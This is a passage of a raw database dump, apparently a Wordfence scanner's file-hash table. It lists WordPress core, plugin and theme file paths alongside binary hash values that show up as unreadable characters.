V9�{��b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�+���l�@�h�','3�i]m���&� ��s֯�I��g�e�ok��/M�','',0,'?'),('��O忯uR��c�[j','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[cl�r�u� �Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('�!��#��I|���F�','wp-includes/js/tinymce/plugins/directionality/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�\"�X & )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('�5V�x�,$�>7d�k�','wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('�6�<��C�﮿�V:(r','wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�be& W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('�=��\0?^ၘ��0CZ�','wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/getting-started.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�aEe���>�� ','AA�gs+���;y������n�weװ�','',0,'?'),('�R���<%���D-�','wp-content/plugins/wp-cerber/assets/flags/co.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@]�\"^��K0��eu>','=Ө�Ĺ^ٜn�_?���*`������s�<�;2','',0,'?'),('�U<�?Y,����ػ(','wp-admin/js/svg-painter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�z4E�=��I)','-&}�)j�ZS�̻e��Ҥ����\'�Z?P�f','',0,'?'),('�U��}�B�� Js��','wp-includes/class-wp-object-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n̩$�������/V','���O�\Zm7l���W���2��m�_/2��$�','',0,'?'),('�y�6�6l�M�C�','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pc�\r��� �\"��','~u~01���8c�8�ɹ��F��E��1=���','',0,'?'),('�|G��$���k���','wp-includes/js/dist/vendor/wp-polyfill-url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J� ���ST�_','',0,'?'),('�}Ua&gl��i�)���!','wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\r�\Z�Y�ܵm`���','~G��s��Mp�����^I�\0~\n)g�<��%��','',0,'?'),('ˍ�G䯀oe���o�','wp-includes/js/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('ˤԐ�{%k�#�f�','wp-includes/js/mediaelement/wp-playlist.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('˼��Ѵo�� ����','wp-content/themes/advance/inc/kirki/includes/class-kirki.php',0,'?�<q/r<���?��','?�<q/r<���?��','�쮀ܻ�3OqJ\0��i<���i<��I��','',0,'?'),('�ǝ��Q��_y�d��+�','wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('���N��\0��ܹ�t','wp-includes/js/jquery/ui/spinner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8��TXi�M�Y�','�>�qJط���0� �\'���R\'n�7s�b3|','',0,'?'),('��XIU�����;�3','wp-content/themes/healing-touch/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','` CÊ�A@����`�','�\'�\\�o4���o�|4I,@ J�O����Ћ�','',0,'?'),('�����k2�n���','wp-content/plugins/wp-cerber/cerber-scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J�L�[�q?���_','o�a��il2V*�B�h_|��{���l��\r��','',0,'?'),('��v�E,�-O�{���','wp-includes/link-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Kn~�?��ӂ~d�','�,�P��en��y����\\A�8����2��','',0,'?'),('����{�@�q��mu','wp-content/themes/twentytwentyone/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��E�50Q��D=�l�','�2&���.����(SG�l���^�N��C&/ρ�','',0,'?'),('� ��N���\\V���\0�','wp-content/themes/regina-lite/inc/customizer/assets/images/gray-lines.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��җv�rȗrhG�0','�3������yy�\'.�U�(�I�v�o���f�\"','',0,'?'),('�!�LT�3��i��x�','wp-admin/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�VgN�7��?:^�','�Z*\n���&z9f?�\"k�>tg','',0,'?'),('�M�Tq&[?��>칊�\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�9+�\"��+��','B��m��N��h�����stN��jAS4X\0$','',0,'?'),('�M����z�ŭY���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�S�aJ�I2ӊ���*�','wp-content/themes/wp-barrister/alt_homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��˹w\"�\rN{~�x�','�pY���doL�����d�r�Q$JJ~�B\'','',0,'?'),('�Vd ]�=M[[ٿ���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�nr�\'U���o{��','�BS�?jP����0h~q��G�^K�ew�vO','',0,'?'),('�V�ڮ����M��jӁ','wp-includes/js/plupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('���i��n�j/�r��','wp-includes/js/dist/i18n.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pMp�s�Rӷ_�_','+��d8/�]��jB���2?��q�����N','',0,'?'),('́ԑ�A�Ha]�\':�','wp-includes/blocks/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�Dn>�u�6j\r','7#�x>֜�bo�R�4#;�ۤ��| J��','',0,'?'),('̇aS{�X�\rq�h�קe','wp-content/themes/skt-toothy/images/page-image-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fBI�(�G\Z�l�8�','{j�ڥ\0�)��2�1_��no������','',0,'?'),('̋��q�B3a�Y��-�','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0`\'}�(���b���A#','c,�Bp�2�8���0j��7}hp-��宆','',0,'?'),('̓ l�珅�\0��;�','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php',0,'1`̺#��+&>�Yhi��','1`̺#��+&>�Yhi��','�a(��J`!�^~���]|�\"b�i','',0,'?'),('̙~�Ȍî+���byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�숊z��;5!��','�D�\Z���L�ޠΔa��]n�\n���L&�\n','',0,'?'),('̽� ���X�$oB�','wp-content/plugins/akismet/_inc/akismet.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z>(9��\"r�4\"��','v&�`���^�i��Af��Eg|!$~�Iu�2�','',0,'?'),('�Ê5ff�;,G!\'��\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�����Wz�EY�','�����Q�M��d�� ���XټT%�c�','',0,'?'),('�����\";+�\rxu���w','wp-includes/js/mediaelement/renderers/vimeo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('�NJ�E�v�c,�صyS^','wp-includes/images/crystal/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('��^��;\\v� \n�w�','wp-content/themes/regina-lite/layout/js/plugins/bxslider/bxslider.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��F�*�vl8�\\]','a���Q�\Zߧ4�����*�3����= ��I','',0,'?'),('��e[�[¡�ʍ��','wp-content/themes/regina-lite/sections/section-home-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8;��ݹ�0��PD�!','����f6䡰\r]����B���7#� ?R','',0,'?'),('����p�j֛`��w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�y-�uv� O�C','����\0���˝`&�q�G%\Zh�����,#�','',0,'?'),('�n �}V-����I�','wp-content/themes/twentytwenty/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�P�2��%F��,�-','�ʄ�%��Ũ�k$ Ȏ������g?��Ҧ�','',0,'?'),('�d���lP�O�I�','wp-admin/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DlR����=���@n','ٔ�fİ�� �qRK/�h��XٱVJH&k�HPB','',0,'?'),('�)����\0�e�_�5=�','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�Q ����f��7�F','�Ҏ��E����؊>^!j��\0O���ca��^��','',0,'?'),('�K=�X�a:�\'5�','wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),('�^&��`R�y����J','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}n�3;g)���','\nj�^�����C�(��UU�i\'9�O','',0,'?'),('�b;���GP�1�&�Y','wp-content/themes/doctors/images/demo/blog_1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!V�U݇��O*�','7,+ǙQ�\0d�k~����1i���B�R�<6.9�','',0,'?'),('�m��L0N\"�T~�b�','wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%��� ^#','',0,'?'),('�t멘`�X���_��ӫ','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/sections/class-epsilon-section-doubled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n[$G�}�W�W��','�����gJЮ�����^ρў��\"%��','',0,'?'),('�w�9=�_\"h%��v','wp-admin/css/install-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\'�K��5oi�J�','�C�C���V��c��x�\"a�8q�vu\Za�','',0,'?'),('́Ӡ3����U�����','wp-content/themes/weblog/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�!,�&�()�2��G�1','����Bm�+\\�M��Xr+�>o6�����\r�g�','',0,'?'),('͓�Y�36��l�Y��','wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('͢=N��\0*oj�G���','wp-content/themes/regina-lite/inc/customizer/panels/advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QH�r������)�','\\�;�> .q�Q�-�9�/V:����F���/�x','',0,'?'),('ͤ8B���¸]��E|','wp-content/plugins/wp-cerber/assets/flags/ky.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M� �d�pV�,�d�','��QP�8�TG�{jrNK�-��,�/l�j ��','',0,'?'),('ͪu�owsFC�G[c��','wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�Co�;�,.!O^�>','Otu��%~�x�ʱ��o��ӗJ���4��%�','',0,'?'),('Ͷ�jʃఱ���-�','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:د_x��O0�8���X','�[�|�r�;�������Ƹ����l�b��� Q','',0,'?'),('ͽ3��=��O�G�|~�','wp-includes/SimplePie/Credit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�6�K>.��L��','r�ٴ��@c�@���{R�CG����d^�>>E\Z','',0,'?'),('�ϘFvD�̫H�','wp-content/plugins/wp-cerber/assets/flags/tg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f/f�|f~�8','=JUV�1H���kE����OZ�oD\\��','',0,'?'),('��3�����F�<��8','wp-includes/js/underscore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����$b��Z�C','�8A�2�xz��\0<G-�E ��r��쇮?�R�','',0,'?'),('��S�>s�U)����H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('���j(g��~jU#��','wp-admin/includes/class-wp-filesystem-ssh2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�\r�<�\n����-��1','�Am���(�t��w�*lEd�s��@������','',0,'?'),('� ��Mu�)`��>�2','wp-content/themes/twentytwentyone/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~E�Ю��ȕ��9~','��q��?{Q%8��ѣ�=��\'N�4oÒ�s','',0,'?'),('�G�6�&���A��+','wp-content/plugins/redirection/matches/custom-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��q%$�h8i^����','�_���r�\\m���t�A&}J�uR�\nڢ�= V','',0,'?'),('�N: ������@�kς','wp-content/themes/twentytwentyone/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�Ɓ.����o���O#','d�{�_�U��R7I���o�(�~�6,\rT���\n��','',0,'?'),('�Y��f/�pw����','wp-includes/Requests/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p����R櫷�\'G','����WwYKL\n�� -*���^e\"e�(_,g','',0,'?'),('�_)-�]�ˌkO ��','wp-includes/ID3/module.tag.apetag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\)���H�G���>�','ٚ+��\"�Bt��� \'S_��̄E�s��_�)^�','',0,'?'),('�l/<��U��ZA��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Sz�L�HAWr�6~','0��pU���gו�G/���%��\'���Zd�\n\n','',0,'?'),('�|��f�����,2�T ','wp-admin/term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�3&�Е��(6�&�','H�4\0�p�B��a��m�f���SU\n��T','',0,'?'),('ΝP|�ڒ����\\�o','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('α�Z ��i�Iȏ�','wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m3�E�?��՛','0pU��Ĭ���h���C�r+���˞I�{-qA�','',0,'?'),('�ҰETn��O��p1�5','wp-content/themes/doctors/core/customizer/customizer-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӑ͞\r l;�N�=�','�K��2�)HpH!B�Ȋ60P�4��&�0N�ul|\n','',0,'?'),('���+4#�E����Wl�3','wp-content/plugins/wp-cerber/assets/flags/ma.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E3ц�Җ`?n~','�Lx����9�yՌ�6luт�l�Ca�e@���','',0,'?'),('�œ���ϔ�=��#6','wp-admin/images/post-formats32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY~�O��{�+_L�kE;','k�<8�._D��K����G[�5e-I(0w��h','',0,'?'),('��\Z��\0��a���+τ','wp-content/themes/advance/inc/kirki/assets/js/controls/repeater.js',0,'�oB,2�kM�@�|�','�oB,2�kM�@�|�','��l��b����v�����mU�?UE(YfD�� t','',0,'?'),('��,���@���Q�','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��\"�sg�4�\\(�8','�@��Zn\"ξ~�QՔ��8�s�P���\07�3','',0,'?'),('�$l�x�\'\r�eO�','wp-content/themes/doctors/core/includes/trunk/fe2/fe2_getver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y)3�1��h[�F�@��','����v߷��-C���d��Y�7Q&�1��96D\r','',0,'?'),('��$e�&�gq�i�m�','wp-content/themes/twentytwenty/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���L�*��H��u���','~��д\"�\'6���xg�k�?$��u�J{R^','',0,'?'),('�$�r�4k�0[&8','wp-content/themes/doctors/core/assets/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B[��$?��K��O�0','Ղ�+kU�Φ\0�RA�ϵ��.>\'�n�>� J','',0,'?'),('�-�+�e���m�u\"��x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ur�\\�٭l_��?�','��.�jflޛ���,&���ĸ�G��Ku�?���','',0,'?'),('�26�6�# S[h(\\��','wp-includes/css/dist/block-library/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QD�����B+|lH��','������\n(�c�CF���T�)I�� V+�','',0,'?'),('�I8j�S�S��;~N','wp-content/themes/doctors/core/assets/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��T#G��<�)�z6�','�]���Ʒ��A��p�I�c�%��~갸*l��','',0,'?'),('�Q�K���Q95�Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>��Y!\\z��JX','��B*yL˰��a��u�\"t�\Z4��Z۳Nk¥','',0,'?'),('�XC�b�;�f\0;<�','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-���S�H1@�kQұ','��^H2m<��LA��m N��G�)Iw��:�D','',0,'?'),('�_q ^��<�8��:� ','wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��U�M�\rv4�GP','M$_��f#5�r�풗g��\0��ra���O�m�N','',0,'?'),('�uF��^G��E+��c','wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���6�|��tJ4�1�','��B�;����M�7�߃��[�9�</�','',0,'?'),('π�tGȩ����D','wp-includes/js/tinymce/plugins/image/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('ρ�h�����Ѱ�ux','wp-content/themes/wp-barrister/library/images/icon-av.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5N�\0T��3��','���$��8���K8?�Or� �j\"\0H�*_�;��j�','',0,'?'),('ϊ=��X���bBz\' �','wp-includes/js/jquery/ui/effect-explode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('Ϛ�\"���j�y����^','wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$ج�o8)�c����','��\Z\Z���#9�#�H�;yό�:˙���#e','',0,'?'),('ϝ���M�f�,�x�','wp-content/themes/weblog/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a���M�Ln���V�uh',']�!R*����\r�,/`W�܂z��X����','',0,'?'),('ϢT��8pʸ5�^^�','wp-content/themes/doctors/core/customizer/help/custom_control_checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�Fb��b�G��Wc','�T����f�f*O�ϳ�U�z}�횺��','',0,'?'),('϶c:�{�:˚�y�Wk','wp-content/plugins/disable-gutenberg/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��y��K�g�e�','NSU�9��Hq����)hQ�{�W\"Y�N��T','',0,'?'),('�����HԹ��f�k�','wp-includes/js/tinymce/wp-tinymce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('���yKv��.�\Z�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��_�3��Nw�#�','�ǥ��mZz*,=:\n��-�3��|��!���','',0,'?'),('�ݙ�P(���O\'E��e','wp-includes/js/jquery/ui/effect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�b�N���\nk!?','aQ���Qޖ�X�g�P�����;���:@�3�','',0,'?'),('�鋭��{^�MU*�_','wp-includes/js/twemoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޮ��!�P��+!�x�','���Q���ӫ��q��6uN�','',0,'?'),('��\\T��@SO�|m','wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8}(�iC-.�w','�Pp��6��R���{��PeP�Q\r�k7�_?�','',0,'?'),('�@��AO= �yA�','wp-includes/class-wp-paused-extensions-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('��]mٲ� ▭�','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w�̩ ��&J����)','���M��,�P:�k�\nN�2�[s\nWze]oN','',0,'?'),('�\Z��YÅjxU�#�6�k','wp-content/plugins/wp-cerber/assets/flags/mx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�W6;���%����','E���&8��0�`�����\ZQ3`���w]#�ע','',0,'?'),('�%#��t���4�x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�W�0{X�n�Z�0','�\0AV�RX��ȕ�~��d�^�/)�@R��','',0,'?'),('�>6bY���AUF�.','wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\nP?^��u:� ','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('�>�s�l�WD7�M�','wp-includes/bookmark-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dZc7��4�JX��','�t��l�P?d���=)��@zi�!��9a�','',0,'?'),('�Tq%<>z�բ�','wp-content/plugins/wp-cerber/assets/flags/bv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4� \Z���rM�','',0,'?'),('Т�펹�|����@','wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �J<�g��o�9:x','�n�c���x0�ĥ���t��N���Y2X\0!','',0,'?'),('в6u_C��i�\r�.','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/icon-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X!��`h�Us���','���D�;�˵o��טu)=�������U��.','',0,'?'),('иn?���\"�xG��','wp-content/themes/weblog/assets/library/Font-Awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��`G��7?O�V9ȿ','k�ս�e+�2@l�\Zu��rL��G0���s6A','',0,'?'),('й� H�n����0����','wp-content/themes/advance/inc/kirki/assets/js/vendor/selectize.js',0,'����ޝ[kk�>S��B','����ޝ[kk�>S��B','N��������_��mw�s�/I�Rú]�T�','',0,'?'),('�×�1�mf$߅�k�S','wp-content/themes/doctors/core/customizer/help/_social-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��XV�u���|�XA��','L��JO�;b^P���?½��0ND�1�ɵ�Å','',0,'?'),('��/��?����U��','wp-includes/Requests/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�!Vs�� �AS�','Lq4���Z��յ�H\0�e7f=��\r�\nDC>OV','',0,'?'),('��2[�v\\)�I���Q','wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('��^�\\�X�PvS�\\�{','wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�V?��a�n\r��','�E������a,�\Z��,yM�/\\iQ�Ӡ\"�?28','',0,'?'),('��/<v`6��Y]��\r','wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���������{ƸM�','�\r���E=���K��I�y!Y��v*�\\��_�>','',0,'?'),('��\":v���zL�d�','wp-content/themes/advance/inc/customizer.php',0,'�D����� �%�P','�D����� �%�P','�UT䑟��\n��\r����3 �U����ްH,�','',0,'?'),('�����,���f��','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZƾB�,J)T�cx','\0IM���|%�c��t�\0�Φ���q��s��5','',0,'?'),('��\'�&��t��\n�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�Oˇ\"��xq�|','�3������;��w@�`^�G��,Ж��^���R�','',0,'?'),('�&\00%�S��n\Z�e','wp-content/plugins/redirection/matches/http-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EX�����p77�\\ʂI�','���3C+���Cxy@��3\Z�ᅨ�f�','',0,'?'),('�UW�~/N�� � �','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nԤ���榡..�X ','���`5�ş�wo���(^�5��U_�gJ�','',0,'?'),('�_\\c9mL�v��1��','wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��}�as� ����?�w','��K���yc��TsKfsb{���- k�X��','',0,'?'),('�ma�vMv�K�\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��G��N��8� ��6','�Y���V)�ceW/�Z��mҳn\'n�\0�MK~','',0,'?'),('�uRl�t����\"��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֊i[L�9ƁH �','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('і��\"��s�k���83','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Ә������)��n','�(%�L{�0�d� &��X�2I���\Z�ʜgq��','',0,'?'),('ѷ 